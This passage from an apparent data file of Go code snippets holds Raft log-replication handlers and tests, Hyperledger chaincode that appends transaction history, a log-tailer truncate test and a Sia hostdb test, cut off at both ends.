*RPC) AppendRPC(args *AppendRPCArgs, reply *AppendRPCReply) error {\n\t//raft.ElectionTimer_ch <- args.LeaderId //TODO\n\tr.ResetTimer() // Reset timer for election \n\tmutex.Lock() \t \n\tr.ResetTimer()\n var logIndex int \n if len(r.Log) > 0 { // If Log is not emtpy.. Initialised Log intex to last heighest log index\n \tlogIndex =len(r.Log)-1\n }else{ \n \tlogIndex =0 // Else Log index is 0\n }\n //fmt.Println(\"LogInedx \",logIndex,\" PrevLogIndex \",args.PrevLogIndex)\n\tif len(args.Entry.Command)!=0{ // If This request has actual logentry to append, else it is heartbeat. \n\t\t\n\t\tr.IsLeader=2 \t\t\t\t // Fall back to Follower state \n\t\tr.LeaderId=args.LeaderId\t // Update to current Leader id \n\t\tr.VotedFor=-1 \t\t\t // Election is over, No need to remember whome u voted for. \n\t\t\t\t\t\t\t\t\t// Thank god... Leader will keep remembering you periodaically :)\n \n\t\t \t if(args.Term < r.CurrentTerm) { // If this logentry has came from Previous Term.. Just Reject it. \n\t\t \treply.Reply=false\n\t\t } else if (logIndex <args.PrevLogIndex) { // log lagging behind, \n\t\t \treply.Reply=false // Set appened to false and \n\t\t reply.NextIndex=logIndex+1 // Set next expected log entry to Heighet log Index +1\n\t\t reply.MatchIndex=-1 \n\t\t r.CurrentTerm=args.Term\t\n\t\t } else if (logIndex > args.PrevLogIndex){ // log is ahead \n\t\t \t if (r.Log[args.PrevLogIndex].Term != args.PrevLogTerm) { // If previous log term does matches with leaders Previous log term \n\t\t \t \t\t\treply.Reply=false \n\t\t reply.NextIndex=args.PrevLogIndex // Set expected next log index to previous to do check matching\n\t\t \treply.MatchIndex = -1\n\t\t \tr.CurrentTerm=args.Term\t\n\t\t } else{ \t\t\t\t\t\t\t\t\t\t// Else Terms is matching, overwrite with log with new entry\n\t\t \t\tr.Log[args.PrevLogIndex+1]=args.Entry \n\t\t\t\t\t\t\treply.Reply=true\n\t\t \treply.MatchIndex=args.PrevLogIndex+1 // Match Index is set to added entry \n\t\t \treply.NextIndex=args.PrevLogIndex+2 // Expected Entry is next log entry after added entry\n\t\t \tr.CurrentTerm=args.Term\t\n\t\t \t//fmt.Println(\"Calling commit in logIndex>PrevLogIndex\")\n\t\t \tCommitCh <- CommitI_LogI{args.LeaderCommit,args.PrevLogIndex+1} // Send Commit index to commitCh to commit log entries, Commit only till newly added aentry\n\t\t }\n\t\t }else if(logIndex == args.PrevLogIndex) { // log is at same space\n\t\t \tif logIndex!=0 && (r.Log[logIndex].Term != args.PrevLogTerm) { // if log is not emtpy, and previous log tersm is matching\n\t\t reply.Reply=false \t\t\t\t\t\t\t\t\t// Reject the log entry \n\t\t reply.NextIndex=args.PrevLogIndex \n\t\t reply.MatchIndex = -1\n\t\t r.CurrentTerm=args.Term\t\n\t\t } else if len(r.Log)==0 && args.Entry.SequenceNumber==0{ // If log is empty and Recieved log entry index is 0, Add Entry\n\t\t \t\t\tr.Log=append(r.Log,args.Entry) \t\n\t\t \t\treply.Reply=true\n\t\t \t\treply.NextIndex=len(r.Log) \t\t\t\t\n\t\t \t\treply.MatchIndex=len(r.Log)-1\n\t\t \t\tr.CurrentTerm=args.Term\t\n\t\t \t\t//fmt.Println(\"Calling commit in logIndex=PrevLogIndex\")\n\t\t \t\tCommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }else if len(r.Log)!=args.Entry.SequenceNumber{ // If log is empty and Recieved log entry index is not 0, Missmatch, Reject\n\t\t \t\t \t//r.Log=append(r.Log,args.Entry)\n\t\t \t\treply.Reply=false\n\t\t \t\treply.NextIndex=len(r.Log)\n\t\t \t\treply.MatchIndex=-1\n\t\t \t\tr.CurrentTerm=args.Term\t\n\t\t \t\t//fmt.Println(\"Calling commit in logIndex=PrevLogIndex\")\n\t\t \t\t//CommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }else {\t\t\t\t\t\t\t\t\t\t\t// Previous log is matched , and this is new entry, add it to last of log\n\t\t \t\t\tr.Log=append(r.Log,args.Entry)\n\t\t \t\treply.Reply=true\n\t\t \t\treply.NextIndex=len(r.Log)\n\t\t \t\treply.MatchIndex=len(r.Log)-1\n\t\t \t\tr.CurrentTerm=args.Term\t\n\t\t \t\t//fmt.Println(\"Calling commit in logIndex=PrevLogIndex\")\n\t\t \t\tCommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }\n\t\t }\n\t\t /* if len (args.Entry.Command)!=0{\n\t\t\t\tfmt.Println(\"Received append rpc for\",r.Id ,\" From \",args.LeaderId, \" Log size is \",logIndex, \" == \",args.PrevLogIndex,\" < \", args.Entry.SequenceNumber ,\" Commitindex \",r.CommitIndex,\" < \",args.LeaderCommit, \"added \",reply.Reply)\n\t\t\t}*/\n\tr.ResetTimer() // This is For precautionaru measure, as system was slow and it was taking more time, leading to expiry of timer\n\t\t\t\t\t// Before replying \t\n\t}else\n\t{\n\t\t/*\n\t\tThis part is same as above but only without actually aadding entries to log. Next index and match index is updated.\n\t\tand CommitCh is feed with commit Index entries\n\t\t*/\n\t\t//fmt.Println(\"Heart Beat recieved \",r.Id,\" \",\"LogInedx \" , len(r.Log)-1,\" PrevLogIndex \",args.PrevLogIndex)\n\t\t//fmt.Println(\"LogInedx \",logIndex,\" PrevLogIndex \",args.PrevLogIndex)\n\t\t if(r.CurrentTerm <= args.Term) { \n\t\t\t\tr.IsLeader=2\n\t\t\t\tr.LeaderId=args.LeaderId\t\n\t\t\t\tr.VotedFor=-1\n\t\t\t\tr.CurrentTerm=args.Term\t\n\t\t\t\tif(logIndex == args.PrevLogIndex && len(r.Log)==0){\n\t\t\t\t\treply.NextIndex=0\n\t\t\t\t\treply.MatchIndex=-1\n\t\t\t\t\t//fmt.Println(\"HeartBeat Recieved logIndex == args.PrevLogIndex && len(r.Log)==0\") \n\t\t\t\t}else if (logIndex <args.PrevLogIndex){\n\t\t\t\t\treply.NextIndex=logIndex+1\n\t\t\t\t\treply.MatchIndex=-1\n\t\t\t\t\t//fmt.Println(\"HeartBeat Recieved logIndex <args.PrevLogIndex\") \n\t\t\t\t}else if (logIndex >args.PrevLogIndex){\n\t\t\t\t\tif (r.Log[args.PrevLogIndex].Term != args.PrevLogTerm) {\n\t\t\t\t\t\treply.Reply=false \n\t\t reply.NextIndex=-1\n\t\t reply.MatchIndex = -1\n\t\t\t\t\t}else{\n\t\t\t\t\t\treply.Reply=true\n\t\t reply.MatchIndex=args.PrevLogIndex\n\t\t reply.NextIndex=args.PrevLogIndex+1\n\t\t CommitCh <- CommitI_LogI{args.LeaderCommit,args.PrevLogIndex+1}\n\t\t\t\t\t}\n\t\t\t\t}else if(logIndex == args.PrevLogIndex) {\n\t\t\t\t\t\tif logIndex!=0 && (r.Log[logIndex].Term != args.PrevLogTerm) {\n\t\t\t\t\t\t\t reply.Reply=false\n\t\t reply.NextIndex=-1\n\t\t reply.MatchIndex = -1\n\n\t\t }else{\n\t\t \treply.Reply=true\n\t\t reply.NextIndex=args.PrevLogIndex+1\n\t\t reply.MatchIndex=args.PrevLogIndex\n\t\t CommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }\n\t\t\t\t\t}\n\t\t\t}\n\tr.ResetTimer()\n\t}\n mutex.Unlock()\n\treturn nil\n}", "func (r *Raft) sendAppend(to uint64) bool {\n\t//\tappend entry\n\tlastIndex := r.RaftLog.LastIndex()\n\tprs := r.Prs[to]\n\tmatched := prs.Match\n\t//if matched < lastIndex {\n\tmsg := r.buildMsgWithoutData(pb.MessageType_MsgAppend, to, false)\n\tvar position int\n\t// send empty append,update follower committed index\n\tif matched == r.RaftLog.LastIndex() {\n\t\tposition = len(r.RaftLog.entries)\n\t} else {\n\t\tp, found := r.RaftLog.findByIndex(matched + 1)\n\t\tif !found {\n\t\t\tpanic(\"not found matched index\")\n\t\t}\n\t\tposition = p\n\t}\n\n\tmsg.Entries = entryValuesToPoints(r.RaftLog.entries[position:])\n\tmsg.Index = prs.Match\n\tt, err := r.RaftLog.Term(prs.Match)\n\tif err != nil {\n\t\tpanic(\"error \")\n\t}\n\tmsg.LogTerm = t\n\tmsg.Commit = r.RaftLog.committed\n\tr.appendMsg(msg)\n\t//update prs\n\tr.Prs[to] = &Progress{\n\t\tMatch: prs.Match,\n\t\tNext: lastIndex + 1,\n\t}\n\treturn true\n\t//}\n\t// Your Code Here (2A).\n\t//return false\n}", "func (r *Raft) sendAppendRpc(value ServerConfig,appendEntry *AppendRPCArgs, AppendAck_ch chan int,isSync bool) {\n\t//not to send the append entries rpc to the leader itself \n\tclient, err := rpc.Dial(\"tcp\", \"localhost:\"+strconv.Itoa(value.LogPort))\n\t//fmt.Println(\"Hostname \",value.Hostname)\n\t//fmt.Println(\"Sending Append RPCs to:\",value.Hostname+\":\"+strconv.Itoa(value.LogPort))\n\n\t if err != nil {\n\t\tlog.Print(\"Error Dialing :\", err)\n\t\tAppendAck_ch <- 0\n\t\treturn\n\t }\n\n\t//defer value.Client.Close() //TODO\n\t defer client.Close()\n\t//this reply is the ack from the followers receiving the append entries\n\tvar reply AppendRPCReply\n\n\terr1 := client.Call(\"RPC.AppendRPC\", appendEntry, &reply)\n\n\tif err1 != nil {\n\t\tlog.Print(\"Remote Method Invocation Error:Append RPC:\", err)\n\t}\n\t\n\t//fmt.Println(\"RPC reply from:\",value.Hostname+\":\"+strconv.Itoa(value.LogPort)+\" is \",reply.Reply)\n\tif reply.NextIndex!=-1 {\n\t\t\n\t\tr.NextIndex[value.Id]=reply.NextIndex\t\n\t}\t\n\tif reply.MatchIndex!=-1 {\n\t\tr.MatchIndex[value.Id]=reply.MatchIndex\n\t}\t\n\tif reply.Reply {\n\t\t AppendAck_ch <- value.Id\n\t}else {\n\t\tAppendAck_ch <-\t-1\n\t}\n}", "func (s *SharedLog_) Append(data []byte) (LogEntry_, error) {\n\tmutex.Lock()\n\tlog := LogEntry_{r.currentTerm, s.LsnLogToBeAdded, data, false}\n\ts.Entries = append(s.Entries, log)\n\ts.LsnLogToBeAdded++\n\tmutex.Unlock()\n\treturn log, nil\n}", "func (c PeerRpc) AddFollower(msg node.ModFollowerListMsg, _ignored *string) error {\n\terr := node.ModifyFollowerList(msg, true)\n\treturn err\n}", "func TestLogReplication1(t *testing.T) {\n\n\tack := make(chan bool)\n\n\t//Get leader\n\tleaderId := raft.GetLeaderId()\n\n\t//Append a log entry to leader as client\n\traft.InsertFakeLogEntry(leaderId)\n\n\tleaderLog := raft.GetLogAsString(leaderId)\n\t// log.Println(leaderLog)\n\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack //Wait for 1 second for log replication to happen\n\n\t//Get logs of all others and compare with each\n\tfor i := 0; i < 5; i++ {\n\t\tcheckIfExpected(t, raft.GetLogAsString(i), leaderLog)\n\t}\n\n}", "func appendUFATransactionHistory(stub shim.ChaincodeStubInterface, ufanumber string, payload string) error {\r\n\tvar recordList []string\r\n\r\n\tlogger.Info(\"Appending to transaction history \" + ufanumber)\r\n\trecBytes, _ := stub.GetState(UFA_TRXN_PREFIX + ufanumber)\r\n\r\n\tif recBytes == nil {\r\n\t\tlogger.Info(\"Updating the transaction history for the first time\")\r\n\t\trecordList = make([]string, 0)\r\n\t} else {\r\n\t\terr := json.Unmarshal(recBytes, &recordList)\r\n\t\tif err != nil {\r\n\t\t\treturn errors.New(\"Failed to unmarshal appendUFATransactionHistory \")\r\n\t\t}\r\n\t}\r\n\trecordList = append(recordList, payload)\r\n\tbytesToStore, _ := json.Marshal(recordList)\r\n\tlogger.Info(\"After updating the transaction history\" + string(bytesToStore))\r\n\tstub.PutState(UFA_TRXN_PREFIX+ufanumber, bytesToStore)\r\n\tlogger.Info(\"Appending to transaction history \" + ufanumber + \" Done!!\")\r\n\treturn nil\r\n}", "func TestHandleLogTruncate(t *testing.T) {\n\tt.Skip(\"flaky\")\n\tta, lines, w, fs, dir := makeTestTailReal(t, \"trunc\")\n\tdefer os.RemoveAll(dir) // clean up\n\n\tlogfile := filepath.Join(dir, \"log\")\n\tf, err := fs.Create(logfile)\n\tif err != nil {\n\t\tt.Fatalf(\"err: %s\", err)\n\t}\n\n\tresult := []*LogLine{}\n\tdone := make(chan struct{})\n\twg := sync.WaitGroup{}\n\tgo func() {\n\t\tfor line := range lines {\n\t\t\tresult = append(result, line)\n\t\t\twg.Done()\n\t\t}\n\t\tclose(done)\n\t}()\n\n\terr = ta.TailPath(logfile)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t_, err = f.WriteString(\"a\\nb\\nc\\n\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\twg.Add(3)\n\twg.Wait()\n\n\terr = f.Truncate(0)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// This is potentially racy. Unlike in the case where we've got new\n\t// lines that we can verify were seen with the WaitGroup, here nothing\n\t// ensures that this update-due-to-truncate is seen by the Tailer before\n\t// we write new data to the file. In order to avoid the race we'll make\n\t// sure that the total data size written post-truncate is less than\n\t// pre-truncate, so that the post-truncate offset is always smaller\n\t// than the offset seen after wg.Add(3); wg.Wait() above.\n\n\t_, err = f.WriteString(\"d\\ne\\n\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\twg.Add(2)\n\n\t// ugh\n\twg.Wait()\n\tw.Close()\n\t<-done\n\n\texpected := []*LogLine{\n\t\t{logfile, \"a\"},\n\t\t{logfile, \"b\"},\n\t\t{logfile, \"c\"},\n\t\t{logfile, \"d\"},\n\t\t{logfile, \"e\"},\n\t}\n\tif diff := cmp.Diff(expected, result); diff != \"\" {\n\t\tt.Errorf(\"result didn't match:\\n%s\", diff)\n\t}\n}", "func AppendCaller() {\n\t\tfor {\n\t\t\tlog_conn := <-Append_ch\n\t\t\tlogentry :=log_conn.Logentry\n\t\t\tconn:=log_conn.Conn\n\t\t\traft.AppendHeartbeat <- 1 // No need to send heartbeat in this cycle, as sending log entires is also treated as heartbeat\n\t\t\tappendAckcount:=1\n\t\t\tsyncNeeded := false\n\t\t\tvar logentry1 LogEntry\n\t\t\tvar args *AppendRPCArgs // Prepare Arguments, \n\t\t\t/*if logentry.SequenceNumber >= 1 {\t // if Log has more than 2 entries\n\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\tr.LeaderId,\n\t\t\t\t\tlogentry.SequenceNumber-1,\n\t\t\t\t\tr.Log[logentry.SequenceNumber-1].Term,\n\t\t\t\t\tlogentry,\n\t\t\t\t\tr.CommitIndex,\n\t\t\t\t}\n\t\t\t} else { \n\t\t\t\targs = &AppendRPCArgs { // if Log has only one entry or no entry\n\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t0,\n\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\tlogentry,\n\t\t\t\t\tr.CommitIndex,\n\t\t\t\t}\n\t\t\t}*/\n\n\t\t\t//fmt.Println(\"Append Recieved \",logentry.SequenceNumber)\n\t\t\t\tvar AppendAck_ch = make (chan int,len(r.ClusterConfigV.Servers)-1)\n\t\t\t\tfor _,server := range r.ClusterConfigV.Servers {\t\t\t\n\t\t\t\t\t\tif server.Id != r.Id {\n\t\t\t\t\t\t\tif(logentry.SequenceNumber>r.NextIndex[server.Id]){\n\t\t\t\t\t\t\t\t\tlogentry1 = r.Log[r.NextIndex[server.Id]]\n\t\t\t\t\t\t\t\t\tsyncNeeded=true\n\t\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\t\tlogentry1 = logentry\t\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\tif logentry1.SequenceNumber >= 1 {\t\n\t\t\t\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\t\t\t\tlogentry1.SequenceNumber-1,\n\t\t\t\t\t\t\t\t\t\tr.Log[logentry1.SequenceNumber-1].Term,\n\t\t\t\t\t\t\t\t\t\tlogentry1,\n\t\t\t\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\t\t\t0,\n\t\t\t\t\t\t\t\t\tr.CurrentTerm,\n\t\t\t\t\t\t\t\t\tlogentry1,\n\t\t\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\t\t\t\n\t\t\t\t\t\t\tgo r.sendAppendRpc(server,args,AppendAck_ch,false) // to send Log entry to follower \n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfor j:=0;j<len(r.ClusterConfigV.Servers)-1;j++{\n\t\t\t\t\t\t\tid:=<- AppendAck_ch \n\t\t\t\t\t\t\tif(id!=-1 && r.MatchIndex[id]==logentry.SequenceNumber){\n\t\t\t\t\t\t\t\tappendAckcount++\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif appendAckcount > len(r.ClusterConfigV.Servers)/2 { // If we have majority in log , update commit index\n\t\t\t\t\t\t\t\tr.CommitIndex=logentry.SequenceNumber\n\t\t\t\t\t\t\t\tlogentry.IsCommitted=true\n\t\t\t\t\t\t\tbreak\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\t/*\tmajorCount:=0\n\t\t\t\t\t\tfor _,serverC:= range r.ClusterConfigV.Servers { // Check if log entry is in majority \n\t\t\t\t\t\t\tif serverC.Id !=r.Id && r.MatchIndex[serverC.Id] == logentry.SequenceNumber {\n\t\t\t\t\t\t\t\tmajorityCount++\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t*/\n\t\t\t\t\tif(logentry.IsCommitted==true){ // If log is committed, write it to log, and send log entry for evaluation on input_ch\n\t\t\t\t\t\t//fmt.Println(\"Commited \",logentry.SequenceNumber)\n\t\t\t\t\t\tr.Log[logentry.SequenceNumber].IsCommitted=true\n\t\t\t\t\t\tlogentry.IsCommitted=true\n\t\t\t\t\t\tr.CommitIndex=logentry.SequenceNumber\n\t\t\t\t\t\tInput_ch <- Log_Conn{logentry, conn}\n\t\t\t\t\t\tr.File.WriteString(strconv.Itoa(logentry.Term)+\" \"+strconv.Itoa(logentry.SequenceNumber)+\" \"+strings.TrimSpace(strings.Replace(string(logentry.Command),\"\\n\",\" \",-1))+\" \"+\n\t\t\" \"+strconv.FormatBool(logentry.IsCommitted))\n\t\t\t\t\t\tr.File.WriteString(\"\\t\\r\\n\");\n\t\t\t\t\t} else { \n\t\t\t\t\t \t\t\t//if syncNeeded==true{ // If Log is not commited, call thsi function to Sync all logs, Logs are sync only till current Logentry, not beyong this even if \n\t\t\t\t\t\t\t\t\t// Leader log has go more entries added while executing this\n\t\t\t\t\t\t\t\t\t//fmt.Println(\"Sync call from append\")\n\t\t\t\t\t\t\t\tsyncNeeded=false\n\t\t\t\t\t\t\t\t//fmt.Println(\"Sync Called from Else\")\n\t\t\t\t\t\t\t\tSyncAllLog(Log_Conn{logentry,conn})\t\t\n\n\t\t\t\t\t\t}\n\t\t\t\t\tif syncNeeded==true{ // If Log is is commited, call thsi function to Sync all logs, Logs are sync only till current Logentry, not beyong this even if \n\t\t\t\t\t\t\t\t\t// Leader log has go more entries added while executing this\n\t\t\t\t\t\t\t\t\t//fmt.Println(\"Sync call from append\")\n\t\t\t\t\t\t//\tfmt.Println(\"Sync Called from syncNeeded == True\")\n\t\t\t\t\t\t\tSyncAllLog(Log_Conn{logentry,conn})\n\t\t\t\t\t\t}\t\t\t\t\t\t\t\t\n\t\t\t\t}\n}", "func (a *RPC) AppendRPC(args *AppendRPCArgs, reply *string) error {\n\t\n\traft.ElectionTimer_ch <- args.LeaderId\n\tentry := args.Entry\n\tr.log.Append(entry.Data())\n\t*reply = \"ACK \" +strconv.FormatUint(uint64(entry.Lsn()),10)\n\t//log.Println(*reply)\n\treturn nil\n}", "func (rf *Raft) replicateLog(server, followerNext, leaderLatest, leaderCommit int, successCh chan<- ReplicateState) {\n\t\tvar args AppendEntriesArgs\n\t\tvar reply AppendEntriesReply\n\t\targs.Me = rf.me\n\t\targs.Term = rf.currentTerm\n\t\targs.PrevIndex = followerNext - 1\n\t\targs.PrevTerm = rf.log[args.PrevIndex].Term\n\t\targs.CommitIndex = leaderCommit\n\n\t\t// New log to replicated\n\t\tif leaderLatest >= followerNext {\n\t\t\targs.Logs = rf.log[followerNext : leaderLatest+1]\n\t\t}\n\n\t\t//log.Println(\"Raft \", rf.me, \" replicate log to server \", server, \" \", args)\n\t\tok := rf.sendAppendEntries(server, &args, &reply)\n\t\tstate := ReplicateState{Ok: false, Result: Failed, Server: server}\n\n\t\tif !ok {\n\t\t\tstate.Ok = false\n\n\t\t} else if !reply.Ok && rf.currentTerm >= reply.Term {\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = LogInconsistent\n\t\t\tstate.Term = reply.Term\n\n\t\t} else if !reply.Ok && rf.currentTerm < reply.Term {\n\t\t\t// Follower has high term, do nothing and just wait new leader's heartbeat\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = OldTerm\n\t\t\tstate.Term = reply.Term\n\n\t\t} else {\n\t\t\tstate.Ok = true\n\t\t\tstate.Result = Success\n\t\t\tstate.Term = reply.Term\n\t\t\tstate.LatestIndex = leaderLatest\n\t\t\tstate.Commit = reply.CommitIndex\n\t\t\t//log.Println(\"Rf \", rf.me, \" replicate to \", server, \" success: \", reply)\n\t\t}\n\n\t\tsuccessCh <- state\n}", "func TestUpdateEntry(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\thdbt, err := newHDBTesterDeps(t.Name(), &disableScanLoopDeps{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Test 1: try calling updateEntry with a blank host. Result should be a\n\t// host with len 2 scan history.\n\tsomeErr := errors.New(\"testing err\")\n\tentry1 := modules.HostDBEntry{\n\t\tPublicKey: types.SiaPublicKey{\n\t\t\tKey: []byte{1},\n\t\t},\n\t}\n\tentry2 := modules.HostDBEntry{\n\t\tPublicKey: types.SiaPublicKey{\n\t\t\tKey: []byte{2},\n\t\t},\n\t}\n\n\t// Try inserting the first entry. Result in the host tree should be a host\n\t// with a scan history length of two.\n\thdbt.hdb.updateEntry(entry1, nil)\n\tupdatedEntry, exists := hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 2 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Timestamp.Before(updatedEntry.ScanHistory[1].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Success || !updatedEntry.ScanHistory[1].Success {\n\t\tt.Error(\"new entry was not given success values despite a successful scan\")\n\t}\n\n\t// Try inserting the second entry, but with an error. Results should largely\n\t// be the same.\n\thdbt.hdb.updateEntry(entry2, someErr)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 2 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Timestamp.Before(updatedEntry.ScanHistory[1].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif updatedEntry.ScanHistory[0].Success || updatedEntry.ScanHistory[1].Success {\n\t\tt.Error(\"new entry was not given success values despite a successful scan\")\n\t}\n\n\t// Insert the first entry twice more, with no error. There should be 4\n\t// entries, and the timestamps should be strictly increasing.\n\thdbt.hdb.updateEntry(entry1, nil)\n\thdbt.hdb.updateEntry(entry1, nil)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 4 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[1].Timestamp.Before(updatedEntry.ScanHistory[2].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[2].Timestamp.Before(updatedEntry.ScanHistory[3].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[2].Success || !updatedEntry.ScanHistory[3].Success {\n\t\tt.Error(\"new entries did not get added with successful timestamps\")\n\t}\n\n\t// Add a non-successful scan and verify that it is registered properly.\n\thdbt.hdb.updateEntry(entry1, someErr)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 5 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[3].Success || updatedEntry.ScanHistory[4].Success {\n\t\tt.Error(\"new entries did not get added with successful timestamps\")\n\t}\n\n\t// Prefix an invalid entry to have a scan from more than maxHostDowntime\n\t// days ago. At less than minScans total, the host should not be deleted\n\t// upon update.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Entry should still exist.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\t// Add enough entries to get to minScans total length. When that length is\n\t// reached, the entry should be deleted.\n\tfor i := len(updatedEntry.ScanHistory); i < minScans; i++ {\n\t\thdbt.hdb.updateEntry(entry2, someErr)\n\t}\n\t// The entry should no longer exist in the hostdb, wiped for being offline.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif exists {\n\t\tt.Fatal(\"entry should have been purged for being offline for too long\")\n\t}\n\n\t// Trigger compression on entry1 by adding a past scan and then adding\n\t// unsuccessful scans until compression happens.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{Timestamp: time.Now().Add(maxHostDowntime * -1).Add(time.Hour * -1)}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor i := len(updatedEntry.ScanHistory); i <= minScans; i++ {\n\t\thdbt.hdb.updateEntry(entry1, someErr)\n\t}\n\t// The result should be compression, and not the entry getting deleted.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"entry should not have been purged for being offline for too long\")\n\t}\n\tif len(updatedEntry.ScanHistory) != minScans {\n\t\tt.Error(\"expecting a different number of scans\", len(updatedEntry.ScanHistory))\n\t}\n\tif updatedEntry.HistoricDowntime == 0 {\n\t\tt.Error(\"host reporting historic downtime?\")\n\t}\n\tif updatedEntry.HistoricUptime != 0 {\n\t\tt.Error(\"host not reporting historic uptime?\")\n\t}\n\n\t// Repeat triggering compression, but with uptime this time.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{Success: true, Timestamp: time.Now().Add(time.Hour * 24 * 11 * -1)}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\thdbt.hdb.updateEntry(entry1, someErr)\n\t// The result should be compression, and not the entry getting deleted.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"entry should not have been purged for being offline for too long\")\n\t}\n\tif len(updatedEntry.ScanHistory) != minScans+1 {\n\t\tt.Error(\"expecting a different number of scans\")\n\t}\n\tif updatedEntry.HistoricUptime == 0 {\n\t\tt.Error(\"host not reporting historic uptime?\")\n\t}\n}", "func appendUFATransactionHistory(stub shim.ChaincodeStubInterface, ufanumber string, payload string) error {\n\tvar recordList []string\n\n\tlogger.Info(\"Appending to transaction history \" + ufanumber)\n\trecBytes, _ := stub.GetState(UFA_TRXN_PREFIX + ufanumber)\n\n\tif recBytes == nil {\n\t\tlogger.Info(\"Updating the transaction history for the first time\")\n\t\trecordList = make([]string, 0)\n\t} else {\n\t\terr := json.Unmarshal(recBytes, &recordList)\n\t\tif err != nil {\n\t\t\treturn errors.New(\"Failed to unmarshal appendUFATransactionHistory \")\n\t\t}\n\t}\n\trecordList = append(recordList, payload)\n\tbytesToStore, _ := json.Marshal(recordList)\n\tlogger.Info(\"After updating the transaction history\" + 